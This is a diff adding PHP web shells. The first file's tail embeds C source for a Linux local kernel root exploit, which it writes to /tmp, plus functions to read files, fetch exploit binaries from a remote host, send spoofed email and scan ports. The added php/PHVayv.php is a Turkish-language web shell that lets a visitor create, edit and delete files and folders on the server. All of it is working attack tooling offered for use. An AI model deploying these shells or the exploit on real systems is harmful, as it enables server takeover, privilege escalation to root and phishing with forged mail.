+              "void fatal(char * msg)\n" .
+              "{\n" .
+              "      fprintf(stderr, \"[-] %s: %s\\n\", msg, strerror(errno));\n" .
+              "      if (dontexit) {\n" .
+              "             fprintf(stderr, \"[-] Unable to exit, entering neverending loop.\\n\");\n" .
+              "             kill(getpid(), SIGSTOP);\n" .
+              "             for (;;) pause();\n" .
+              "      }\n" .
+              "      exit(EXIT_FAILURE);\n" .
+              "}\n" .
+              "void configure(void)\n" .
+              "{\n" .
+              "      unsigned val;\n" .
+              "      task_size = ((unsigned)&val + 1 GB ) / (1 GB) * 1 GB;\n" .
+              "      uid = getuid();\n" .
+              "}\n" .
+              "void expand(void)\n" .
+              "{\n" .
+              "      unsigned top = (unsigned) sbrk(0);\n" .
+              "      unsigned limit = address + PAGE_SIZE;\n" .
+              "      do {\n" .
+              "             if (sbrk(PAGE_SIZE) == NULL)\n" .
+              "                   fatal(\"Kernel seems not to be vulnerable\");\n" .
+              "             dontexit = 1;\n" .
+              "             top += PAGE_SIZE;\n" .
+              "      } while (top < limit);\n" .
+              "}\n" .
+              "jmp_buf jmp;\n" .
+              "#define MAP_NOPAGE 1\n" .
+              "#define MAP_ISPAGE 2\n" .
+              "void sigsegv(int signo, siginfo_t * si, void * ptr)\n" .
+              "{\n" .
+              "      struct ucontext * uc = (struct ucontext *) ptr;\n" .
+              "      int error_code = uc->uc_mcontext.gregs[REG_ERR];\n" .
+              "      (void)signo;\n" .
+              "      (void)si;\n" .
+              "      error_code = MAP_NOPAGE + (error_code & 1);\n" .
+              "      longjmp(jmp, error_code);\n" .
+              "}\n" .
+              "void prepare(void)\n" .
+              "{\n" .
+              "      struct sigaction sa;\n" .
+              "      sa.sa_sigaction = sigsegv;\n" .
+              "      sa.sa_flags = SA_SIGINFO | SA_NOMASK;\n" .
+              "      sigemptyset(&sa.sa_mask);\n" .
+              "      sigaction(SIGSEGV, &sa, NULL);\n" .
+              "}\n" .
+              "int testaddr(unsigned addr)\n" .
+              "{\n" .
+              "      int val;\n" .
+              "      val = setjmp(jmp);\n" .
+              "      if (val == 0) {\n" .
+              "             asm (\"verr (%%eax)\" : : \"a\" (addr));\n" .
+              "             return MAP_ISPAGE;\n" .
+              "      }\n" .
+              "      return val;\n" .
+              "}\n" .
+              "#define map_pages (((TOP_ADDR - task_size) + PAGE_SIZE - 1) / PAGE_SIZE)\n" .
+              "#define map_size (map_pages + 8*sizeof(unsigned) - 1) / (8*sizeof(unsigned))\n" .
+              "#define next(u, b) do { if ((b = 2*b) == 0) { b = 1; u++; } } while(0)\n" .
+              "void map(unsigned * map)\n" .
+              "{\n" .
+              "      unsigned addr = task_size;\n" .
+              "      unsigned bit = 1;\n" .
+              "      prepare();\n" .
+              "      while (addr < TOP_ADDR) {\n" .
+              "             if (testaddr(addr) == MAP_ISPAGE)\n" .
+              "                   *map |= bit;\n" .
+              "             addr += PAGE_SIZE;\n" .
+              "             next(map, bit);\n" .
+              "      }\n" .
+              "      signal(SIGSEGV, SIG_DFL);\n" .
+              "}\n" .
+              "void find(unsigned * m)\n" .
+              "{\n" .
+              "      unsigned addr = task_size;\n" .
+              "      unsigned bit = 1;\n" .
+              "      unsigned count;\n" .
+              "      unsigned tmp;\n" .
+              "      prepare();\n" .
+              "      tmp = address = count = 0U;\n" .
+              "      while (addr < TOP_ADDR) {\n" .
+              "             int val = testaddr(addr);\n" .
+              "             if (val == MAP_ISPAGE && (*m & bit) == 0) {\n" .
+              "                   if (!tmp) tmp = addr;\n" .
+              "                   count++;\n" .
+              "             } else {\n" .
+              "                   if (tmp && count == LDT_PAGES) {\n" .
+              "                          errno = EAGAIN;\n" .
+              "                          if (address)\n" .
+              "                                fatal(\"double allocation\\n\");\n" .
+              "                          address = tmp;\n" .
+              "                   }\n" .
+              "                   tmp = count = 0U;\n" .
+              "             }\n" .
+              "             addr += PAGE_SIZE;\n" .
+              "             next(m, bit);\n" .
+              "      }\n" .
+              "      signal(SIGSEGV, SIG_DFL);\n" .
+              "      if (address)\n" .
+              "             return;\n" .
+              "      errno = ENOTSUP;\n" .
+              "      fatal(\"Unable to determine kernel address\");\n" .
+              "}\n" .
+              "int modify_ldt(int, void *, unsigned);\n" .
+              "void ldt(unsigned * m)\n" .
+              "{\n" .
+              "      struct modify_ldt_ldt_s l;\n" .
+              "      map(m);\n" .
+              "      memset(&l, 0, sizeof(l));\n" .
+              "      l.entry_number = LDT_ENTRIES - 1;\n" .
+              "      l.seg_32bit = 1;\n" .
+              "      l.base_addr = MAGIC >> 16;\n" .
+              "      l.limit = MAGIC & 0xffff;\n" .
+              "      if (modify_ldt(1, &l, sizeof(l)) == -1)\n" .
+              "             fatal(\"Unable to set up LDT\");\n" .
+              "      l.entry_number = ENTRY_MAGIC / 2;\n" .
+              "      if (modify_ldt(1, &l, sizeof(l)) == -1)\n" .
+              "             fatal(\"Unable to set up LDT\");\n" .
+              "      find(m);\n" .
+              "}\n" .
+              "asmlinkage void kernel(unsigned * task)\n" .
+              "{\n" .
+              "      unsigned * addr = task;\n" .
+              "      /* looking for uids */\n" .
+              "      while (addr[0] != uid || addr[1] != uid ||\n" .
+              "             addr[2] != uid || addr[3] != uid)\n" .
+              "             addr++;\n" .
+              "      addr[0] = addr[1] = addr[2] = addr[3] = 0;    /* uids */\n" .
+              "      addr[4] = addr[5] = addr[6] = addr[7] = 0;    /* uids */\n" .
+              "      addr[8] = 0;\n" .
+              "      /* looking for vma */\n" .
+              "      for (addr = (unsigned *) task_size; addr; addr++) {\n" .
+              "             if (addr[0] >= task_size && addr[1] < task_size &&\n" .
+              "                 addr[2] == address && addr[3] >= task_size) {\n" .
+              "                   addr[2] = task_size - PAGE_SIZE;\n" .
+              "                   addr = (unsigned *) addr[3];\n" .
+              "                   addr[1] = task_size - PAGE_SIZE;\n" .
+              "                   addr[2] = task_size;\n" .
+              "                   break;\n" .
+              "             }\n" .
+              "      }\n" .
+              "}\n" .
+              "void kcode(void);\n" .
+              "#define __str(s) #s\n" .
+              "#define str(s) __str(s)\n" .
+              "void __kcode(void)\n" .
+              "{\n" .
+              "      asm(\n" .
+              "             \"kcode:                                \\n\"\n" .
+              "             \"     pusha                            \\n\"\n" .
+              "             \"     pushl %es                        \\n\"\n" .
+              "             \"     pushl %ds                        \\n\"\n" .
+              "             \"     movl   $(\" str(DS) \") ,%edx      \\n\"\n" .
+              "             \"     movl   %edx,%es                  \\n\"\n" .
+              "             \"     movl   %edx,%ds                  \\n\"\n" .
+              "             \"     movl   $0xffffe000,%eax          \\n\"\n" .
+              "             \"     andl   %esp,%eax                 \\n\"\n" .
+              "             \"     pushl %eax                       \\n\"\n" .
+              "             \"     call   kernel                    \\n\"\n" .
+              "             \"     addl   $4, %esp                  \\n\"\n" .
+              "             \"     popl   %ds                       \\n\"\n" .
+              "             \"     popl   %es                       \\n\"\n" .
+              "             \"     popa                             \\n\"\n" .
+              "             \"     lret                             \\n\"\n" .
+              "      );\n" .
+              "}\n" .
+              "void knockout(void)\n" .
+              "{\n" .
+              "      unsigned * addr = (unsigned *) address;\n" .
+              "      if (mprotect(addr, PAGE_SIZE, PROT_READ|PROT_WRITE) == -1)\n" .
+              "             fatal(\"Unable to change page protection\");\n" .
+              "      errno = ESRCH;\n" .
+              "      if (addr[ENTRY_MAGIC] != MAGIC)\n" .
+              "             fatal(\"Invalid LDT entry\");\n" .
+              "      /* setting call gate and privileged descriptors */\n" .
+              "      addr[ENTRY_GATE+0] = ((unsigned)CS << 16) | ((unsigned)kcode & 0xffffU);\n" .
+              "      addr[ENTRY_GATE+1] = ((unsigned)kcode & ~0xffffU) | 0xec00U;\n" .
+              "      addr[ENTRY_CS+0] = 0x0000ffffU; /* kernel 4GB code at 0x00000000 */\n" .
+              "      addr[ENTRY_CS+1] = 0x00cf9a00U;\n" .
+              "      addr[ENTRY_DS+0] = 0x0000ffffU; /* user   4GB code at 0x00000000 */\n" .
+              "      addr[ENTRY_DS+1] = 0x00cf9200U;\n" .
+              "      prepare();\n" .
+              "      if (setjmp(jmp) != 0) {\n" .
+              "             errno = ENOEXEC;\n" .
+              "             fatal(\"Unable to jump to call gate\");\n" .
+              "      }\n" .
+              "      asm(\"lcall $\" str(GATE) \",$0x0\");      /* this is it */\n" .
+              "}\n" .
+              "void shell(void)\n" .
+              "{\n" .
+              "      char * argv[] = { _PATH_BSHELL, NULL };\n" .
+              "      execve(_PATH_BSHELL, argv, environ);\n" .
+              "      fatal(\"Unable to spawn shell\\n\");\n" .
+              "}\n" .
+              "void remap(void)\n" .
+              "{\n" .
+              "      static char stack[8 MB];  /* new stack */\n" .
+              "      static char * envp[] = { \"PATH=\" _PATH_STDPATH, NULL };\n" .
+              "      static unsigned * m;\n" .
+              "      static unsigned b;\n" .
+              "      m = (unsigned *) sbrk(map_size);\n" .
+              "      if (!m)\n" .
+              "             fatal(\"Unable to allocate memory\");\n" .
+              "      environ = envp;\n" .
+              "      asm (\"movl %0, %%esp\\n\" : : \"a\" (stack + sizeof(stack)));\n" .
+              "      b = ((unsigned)sbrk(0) + PAGE_SIZE - 1) & PAGE_MASK;\n" .
+              "      if (munmap((void*)b, task_size - b) == -1)\n" .
+              "             fatal(\"Unable to unmap stack\");\n" .
+              "      while (b < task_size) {\n" .
+              "             if (sbrk(PAGE_SIZE) == NULL)\n" .
+              "                   fatal(\"Unable to expand BSS\");\n" .
+              "             b += PAGE_SIZE;\n" .
+              "      }\n" .
+              "      ldt(m);\n" .
+              "      expand();\n" .
+              "      knockout();\n" .
+              "      shell();\n" .
+              "}\n" .
+              "int main(void)\n" .
+              "{\n" .
+              "      configure();\n" .
+              "      remap();\n" .
+              "      return EXIT_FAILURE;\n" .
+              "}\n";
+
+    $fp = fopen("/tmp/xpl_brk.c", "w");
+    $ok = fwrite($fp, $kernel);
+    
+    if (!empty($ok)) {
+      echo "<DIV STYLE=\"font-family: verdana; font-size: 15px;\">[*] Linux Local Kernel Exploit Was Successfuly Copied</DIV>";
+    } else {
+      echo "<DIV STYLE=\"font-family: verdana; font-size: 15px;\">[-] An Error Has Ocurred While Copying Kernel Exploit</DIV>";
+    }
+  }
+
+?>
+</CENTER>
+<pre><font face="Tahoma" size="2">
+<?php
+
+// Function to Visualize Source Code files 
+if ($see != "") {
+  $fp = fopen($see, "r"); 
+  $read = fread($fp, 30000); 
+  echo "============== $see ================<br>";
+  echo "<textarea name=textarea cols=80 rows=15>"; 
+  echo "$read"; 
+  Echo "</textarea>"; 
+}
+
+// Function to Dowload Local Xploite Binary COde or Source Code
+
+if ($dx != "") {
+  $fp = @fopen("$hostxpl",r);
+  $fp2 = @fopen("$storage","w");
+  fwrite($fp2, "");
+  $fp1 = @fopen("$storage","a+");
+  for (;;) {
+    $read = @fread($fp, 4096);
+    if (empty($read)) break;
+    $ok = fwrite($fp1, $read);
+    
+    if (empty($ok)) {
+      echo "<DIV STYLE=\"font-family: verdana; font-size: 15px;\">[-] An Error Has Ocurred While Uploading File</DIV>";
+      break;
+    }
+  }
+
+  if (!empty($ok)) {
+    echo "<DIV STYLE=\"font-family: verdana; font-size: 15px;\">[*] File Was Successfuly Uploaded</DIV>";
+  }
+}
+
+flush( );
+
+// Function to visulize Format Color Source Code PHP
+
+if ($sfc != "") {
+  $showcode = show_source("$sfc");
+  echo "<font size=4> $showcode </font>";
+}
+
+// Function to Visualize all infomation files
+if ($fileinfo != "") {
+  $infofile = stat("$fileanalize");
+  while (list($info, $value) = each ($infofile)) {
+    echo" Info: $info  Value: $value <br>";
+  }
+}
+
+// Function to send fake mail
+if ($fake == 1) {
+  echo "<FORM METHOD=POST ACTION=\"$SCRIPT_NAME?$QUERY_STRING&send=1\">";
+  echo "Your Fake Mail <INPUT TYPE=\"\" NAME=\"yourmail\"><br>";
+  echo "Your Cavy:<INPUT TYPE=\"\" NAME=\"cavy\"><br>";
+  echo "Suject: <INPUT TYPE=\"text\" NAME=\"subject\"><br>";
+  echo "Text: <TEXTAREA NAME=\"body\" ROWS=\"\" COLS=\"\"></TEXTAREA><br>";
+  echo "<INPUT TYPE=\"hidden\" NAME=\"send\" VALUE=\"1\"><br>";
+  echo "<INPUT TYPE=\"submit\" VALUE=\"Send Fake Mail\">";
+  echo "</FORM>";
+}
+
+if($send == 1) {
+  if (mail($cavy, $subject, $body, "From: $yourmail\r\n")) {
+    echo "<DIV STYLE=\"font-family: verdana; font-size: 15px;\">[*] Mail Send Sucessfuly</DIV>";
+  } else {
+    echo "<DIV STYLE=\"font-family: verdana; font-size: 15px;\">[-] An Error Has Ocurred While Sending Mail</DIV>";
+  }
+}
+
+if ($portscan != "") {
+  $port = array ("21","22","23","25","110",);
+  $values = count($port);
+  for ($cont=0; $cont < $values; $cont++) {
+    @$sock[$cont] = Fsockopen($SERVER_NAME, $port[$cont], $oi, $oi2, 1);
+    $service = Getservbyport($port[$cont],"tcp");
+    @$get = fgets($sock[$cont]);
+    echo "<br>Port: $port[$cont] - Service: $service<br><br>";
+    echo "<br>Banner: $get <br><br>";
+    flush();
+  }
+}
+
+?> 
+</font></pre>

php/PHVayv.php

@@ -0,0 +1,597 @@
+<? if($sistembilgisi > "") {phpinfo();} else { ?>
+
+
+<?$fistik=PHVayv;?>
+
+
+<?if ($sildos>"") {unlink("$dizin/$sildos");} ?>
+
+<?if ($dizin== ""){$dizin=realpath('.');}{$dizin=realpath($dizin);}?>
+
+<?if ($silklas > ""){rmdir($silklas);}?>
+
+<?if ($yeniklasor > "") {mkdir("$dizin/$duzenx2",777);}?>
+
+
+
+<?if ($yenidosya == "1") {
+$baglan=fopen("$dizin/$duzenx2",'w');
+fwrite($baglan,$duzenx);
+fclose($baglan);}
+?>
+
+
+
+
+<?if ($duzkaydet > "") {
+
+$baglan=fopen($duzkaydet,'w');
+fwrite($baglan,$duzenx);
+fclose($baglan);}
+?>
+
+
+
+
+<?if ($yenklas>"") {;?>
+<body topmargin="0" leftmargin="0">
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1" height="59">
+  <tr>
+    <td width="70" bgcolor="#000000" height="76">
+    <p align="center">
+    <img border="0" src="http://www.aventgrup.net/avlog.gif"></td>
+    <td width="501" bgcolor="#000000" height="76" valign="top">
+    <font face="Verdana" style="font-size: 8pt" color="#B7B7B7">
+    <span style="font-weight: 700">
+    <br>
+    AventGrup©<br>
+    </span>Avrasya Veri ve NetWork Teknolojileri Geliþtirme Grubu<br>
+    <span style="font-weight: 700">
+    <br>
+    PHVayv 1.0</span></font></td>
+    <td width="431" bgcolor="#000000" height="76" valign="top">
+    <p align="right"><span style="font-weight: 700">
+    <font face="Verdana" color="#858585" style="font-size: 2pt"><br>
+    </font><font face="Verdana" style="font-size: 8pt" color="#9F9F9F">
+    <a href="http://www.aventgrup.net" style="text-decoration: none">
+    <font color="#858585">www.aventgrup.net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;<br>
+    </font></span><font face="Verdana" style="font-size: 8pt" color="#858585">
+    <a href="mailto:shopen@aventgrup.net" style="text-decoration: none">
+    <font color="#858585">SHOPEN</font></a></font><font face="Verdana" style="font-size: 8pt" color="#B7B7B7"><a href="mailto:shopen@aventgrup.net" style="text-decoration: none"><font color="#858585">@AventGrup.Net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;</font></td>
+  </tr>
+  </table>
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" id="AutoNumber5" width="100%" height="20">
+      <tr>
+        <td width="110" bgcolor="#9F9F9F" height="20"><font face="Verdana">
+        <span style="font-size: 8pt">&nbsp;Çalýþýlan </span></font>
+        <font face="Verdana" style="font-size: 8pt">Dizin</font></td>
+        <td bgcolor="#D6D6D6" height="20">
+        <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber4">
+          <tr>
+            <td width="1"></td>
+            <td><font face="Verdana" style="font-size: 8pt">&nbsp;<?echo "$dizin"?></font></td>
+            <td width="65">
+            &nbsp;</td>
+          </tr>
+        </table>
+        </td>
+      </tr>
+</table>
+
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber30" height="184">
+  <tr>
+    <td width="100%" bgcolor="#000000" height="19">&nbsp;</td>
+  </tr>
+  <tr>
+    <td width="100%" bgcolor="#9F9F9F" align="center" height="144">
+    <form method="POST" action="<?echo "$fistik.php?yeniklasor=1&dizin=$dizin"?>" 
+      <p align="center"><br>
+      <font
+                color="#FFFFFF" size="1" face="Arial">
+<input
+                type="text" size="37" maxlength="32"
+                name="duzenx2" value="Klasör Adý"
+                class="search"
+                onblur="if (this.value == '') this.value = 'Kullanýcý'"
+                onfocus="if (this.value == 'Kullanýcý') this.value=''"
+                style="BACKGROUND-COLOR: #eae9e9; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: center"></font></p>
+<p align="center">
+	<span class="gensmall">
+		<input type="submit" size="16"
+		name="duzenx1" value="Kaydet"
+		style="BACKGROUND-COLOR: #95B4CC; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: center"
+		</span></span><b><font face="Verdana, Arial, Helvetica, sans-serif" size="2"><br>
+&nbsp;</font></b></p>
+</form>
+</td>
+  </tr>
+  <tr>
+    <td width="100%" bgcolor="#000000" align="center" height="19">
+    &nbsp;</td>
+  </tr>
+  </table>
+  
+
+
+<? } else { ?>
+
+
+
+
+<?if ($yendos>"") {;
+?>
+
+<body topmargin="0" leftmargin="0">
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1" height="59">
+  <tr>
+    <td width="70" bgcolor="#000000" height="76">
+    <p align="center">
+    <img border="0" src="http://www.aventgrup.net/avlog.gif"></td>
+    <td width="501" bgcolor="#000000" height="76" valign="top">
+    <font face="Verdana" style="font-size: 8pt" color="#B7B7B7">
+    <span style="font-weight: 700">
+    <br>
+    AventGrup©<br>
+    </span>Avrasya Veri ve NetWork Teknolojileri Geliþtirme Grubu<br>
+    <span style="font-weight: 700">
+    <br>
+    PHVayv 1.0</span></font></td>
+    <td width="431" bgcolor="#000000" height="76" valign="top">
+    <p align="right"><span style="font-weight: 700">
+    <font face="Verdana" color="#858585" style="font-size: 2pt"><br>
+    </font><font face="Verdana" style="font-size: 8pt" color="#9F9F9F">
+    <a href="http://www.aventgrup.net" style="text-decoration: none">
+    <font color="#858585">www.aventgrup.net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;<br>
+    </font></span><font face="Verdana" style="font-size: 8pt" color="#858585">
+    <a href="mailto:shopen@aventgrup.net" style="text-decoration: none">
+    <font color="#858585">SHOPEN</font></a></font><font face="Verdana" style="font-size: 8pt" color="#B7B7B7"><a href="mailto:shopen@aventgrup.net" style="text-decoration: none"><font color="#858585">@AventGrup.Net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;</font></td>
+  </tr>
+  </table>
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" id="AutoNumber5" width="100%" height="20">
+      <tr>
+        <td width="110" bgcolor="#9F9F9F" height="20"><font face="Verdana">
+        <span style="font-size: 8pt">&nbsp;Çalýþýlan </span></font>
+        <font face="Verdana" style="font-size: 8pt">Dizin</font></td>
+        <td bgcolor="#D6D6D6" height="20">
+        <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber4">
+          <tr>
+            <td width="1"></td>
+            <td><font face="Verdana" style="font-size: 8pt">&nbsp;<?echo "$dizin"?></font></td>
+            <td width="65">
+            &nbsp;</td>
+          </tr>
+        </table>
+        </td>
+      </tr>
+</table>
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1" height="495">
+  <tr>
+    <td width="100%" bgcolor="#000000" height="19">&nbsp;</td>
+  </tr>
+  <tr>
+    <td width="100%" bgcolor="#9F9F9F" align="center" height="455">
+    <form method="POST" action="<?echo "$fistik.php?yenidosya=1&dizin=$dizin"?>" 
+      <p align="center"><br>
+      <font
+                color="#FFFFFF" size="1" face="Arial">
+<input
+                type="text" size="50" maxlength="32"
+                name="duzenx2" value="Dosya Adý"
+                class="search"
+                onblur="if (this.value == '') this.value = 'Kullanýcý'"
+                onfocus="if (this.value == 'Kullanýcý') this.value=''"
+                style="BACKGROUND-COLOR: #eae9e9; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: center"></font></p>
+<p align="center"><b><font face="Verdana, Arial, Helvetica, sans-serif" size="2" color="#000000" bgcolor="Red"> 
+          <textarea name="duzenx" 
+          style="BACKGROUND-COLOR: #eae9e9; BORDER-BOTTOM: #000000 1px inset; BORDER-CENTER: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: left"
+        
+          
+          rows="24" cols="122" wrap="OFF">XXXX</textarea></font><font face="Verdana, Arial, Helvetica, sans-serif" size="2"><br>
+<br>
+</font></b>
+	<span class="gensmall">
+		<input type="submit" size="16"
+		name="duzenx1" value="Kaydet"
+		style="BACKGROUND-COLOR: #95B4CC; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: center"
+		</span><br>
+&nbsp;</p>
+</form>
+</td>
+  </tr>
+  <tr>
+    <td width="100%" bgcolor="#000000" align="center" height="19">
+    &nbsp;</td>
+  </tr>
+  </table>
+  
+
+
+<? } else { ?>
+
+
+
+
+
+<?if ($duzenle>"") {; 
+?>
+
+
+
+
+<body topmargin="0" leftmargin="0">
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1" height="59">
+  <tr>
+    <td width="70" bgcolor="#000000" height="76">
+    <p align="center">
+    <img border="0" src="http://www.aventgrup.net/avlog.gif"></td>
+    <td width="501" bgcolor="#000000" height="76" valign="top">
+    <font face="Verdana" style="font-size: 8pt" color="#B7B7B7">
+    <span style="font-weight: 700">
+    <br>
+    AventGrup©<br>
+    </span>Avrasya Veri ve NetWork Teknolojileri Geliþtirme Grubu<br>
+    <span style="font-weight: 700">
+    <br>
+    PHVayv 1.0</span></font></td>
+    <td width="431" bgcolor="#000000" height="76" valign="top">
+    <p align="right"><span style="font-weight: 700">
+    <font face="Verdana" color="#858585" style="font-size: 2pt"><br>
+    </font><font face="Verdana" style="font-size: 8pt" color="#9F9F9F">
+    <a href="http://www.aventgrup.net" style="text-decoration: none">
+    <font color="#858585">www.aventgrup.net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;<br>
+    </font></span><font face="Verdana" style="font-size: 8pt" color="#858585">
+    <a href="mailto:shopen@aventgrup.net" style="text-decoration: none">
+    <font color="#858585">SHOPEN</font></a></font><font face="Verdana" style="font-size: 8pt" color="#B7B7B7"><a href="mailto:shopen@aventgrup.net" style="text-decoration: none"><font color="#858585">@AventGrup.Net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;</font></td>
+  </tr>
+  </table>
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" id="AutoNumber5" width="100%" height="1">
+      <tr>
+        <td width="110" bgcolor="#9F9F9F" height="1"><font face="Verdana">
+        <span style="font-size: 8pt">&nbsp;Çalýþýlan Dosya</span></font></td>
+        <td bgcolor="#D6D6D6" height="1">
+        <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber4" height="19">
+          <tr>
+            <td width="1" height="19"></td>
+            <td rowspan="2" height="19"><font face="Verdana" style="font-size: 8pt">&nbsp;<?echo "$dizin/$duzenle"?></font></td>
+          </tr>
+          <tr>
+            <td width="1" height="1"></td>
+          </tr>
+        </table>
+        </td>
+      </tr>
+</table>
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1">
+  <tr>
+    <td width="100%" bgcolor="#000000">&nbsp;</td>
+  </tr>
+  <tr>
+    <td width="100%" bgcolor="#9F9F9F">
+    <form method="POST" action="<?echo "PHVayv.php?duzkaydet=$dizin/$duzenle&dizin=$dizin"?>" name="kaypos">
+<p align="center"><b><font face="Verdana, Arial, Helvetica, sans-serif" size="2" color="#000000" bgcolor="Red"> 
+          <br>
+          <textarea name="duzenx" 
+          style="BACKGROUND-COLOR: #eae9e9; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: left"
+        
+          
+          rows="24" cols="122" wrap="OFF"><?$baglan=fopen("$dizin/$duzenle",'r');
+while(! feof ( $baglan ) ){
+$okunan=fgets($baglan,1024);
+echo $okunan;
+} fclose($baglan); ?></textarea></font><font face="Verdana, Arial, Helvetica, sans-serif" size="2"><br>
+<br>
+</font></b>
+	<span class="gensmall">
+		<input type="submit" size="16"
+		name="duzenx1" value="Kaydet"
+		style="BACKGROUND-COLOR: #95B4CC; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: center"
+		</span></p>
+</form>
+</td>
+  </tr>
+  <tr>
+    <td width="100%" bgcolor="#000000">
+    &nbsp;</td>
+  </tr>
+  </table>
+
+
+
+
+
+
+
+
+
+
+
+<?
+} else {
+?>
+
+
+
+<html>
+
+<head>
+<meta http-equiv="Content-Language" content="tr">
+<meta name="GENERATOR" content="Microsoft FrontPage 5.0">
+<meta name="ProgId" content="FrontPage.Editor.Document">
+<meta http-equiv="Content-Type" content="text/html; charset=windows-1254">
+<title>PHVayv 1.0</title>
+</head>
+
+<body topmargin="0" leftmargin="0">
+
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1" height="59">
+  <tr>
+    <td width="70" bgcolor="#000000" height="76">
+    <p align="center">
+    <img border="0" src="http://www.aventgrup.net/avlog.gif"></td>
+    <td width="501" bgcolor="#000000" height="76" valign="top">
+    <font face="Verdana" style="font-size: 8pt" color="#B7B7B7">
+    <span style="font-weight: 700">
+    <br>
+    AventGrup©<br>
+    </span>Avrasya Veri ve NetWork Teknolojileri Geliþtirme Grubu<br>
+    <span style="font-weight: 700">
+    <br>
+    PHVayv 1.0</span></font></td>
+    <td width="431" bgcolor="#000000" height="76" valign="top">
+    <p align="right"><span style="font-weight: 700">
+    <font face="Verdana" color="#858585" style="font-size: 2pt"><br>
+    </font><font face="Verdana" style="font-size: 8pt" color="#9F9F9F">
+    <a href="http://www.aventgrup.net" style="text-decoration: none">
+    <font color="#858585">www.aventgrup.net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;<br>
+    </font></span><font face="Verdana" style="font-size: 8pt" color="#858585">
+    <a href="mailto:shopen@aventgrup.net" style="text-decoration: none">
+    <font color="#858585">SHOPEN</font></a></font><font face="Verdana" style="font-size: 8pt" color="#B7B7B7"><a href="mailto:shopen@aventgrup.net" style="text-decoration: none"><font color="#858585">@AventGrup.Net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;</font></td>
+  </tr>
+  </table>
+
+
+
+    <table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" id="AutoNumber5" width="100%" height="20">
+      <tr>
+        <td width="110" bgcolor="#9F9F9F" height="20"><font face="Verdana">
+        <span style="font-size: 8pt">&nbsp;Çalýþýlan Klasör</span></font></td>
+        <td bgcolor="#D6D6D6" height="20">
+        <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber4">
+          <tr>
+            <td width="1"></td>
+            <td><font face="Verdana" style="font-size: 8pt">&nbsp;<?echo "$dizin"?></font></td>
+            <td width="65">
+            <table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber6" height="13">
+              <tr>
+                <td width="100%" bgcolor="#B7B7B7" bordercolor="#9F9F9F" height="13"
+                onmouseover='this.style.background="D9D9D9"'
+                onmouseout='this.style.background="9F9F9F"'
+                style="CURSOR: hand"
+                
+                
+                
+                
+                >
+                <p align="center"><font face="Verdana" style="font-size: 8pt">
+
+
+
+
+
+
+                <a href="<?echo "$fistik.php?dizin=$dizin/../"?>" style="text-decoration: none">
+                <font color="#000000">Üst Klasör</font></a></font></td>
+
+              </tr>
+            </table>
+            </td>
+          </tr>
+        </table>
+        </td>
+      </tr>
+    </table>
+
+
+
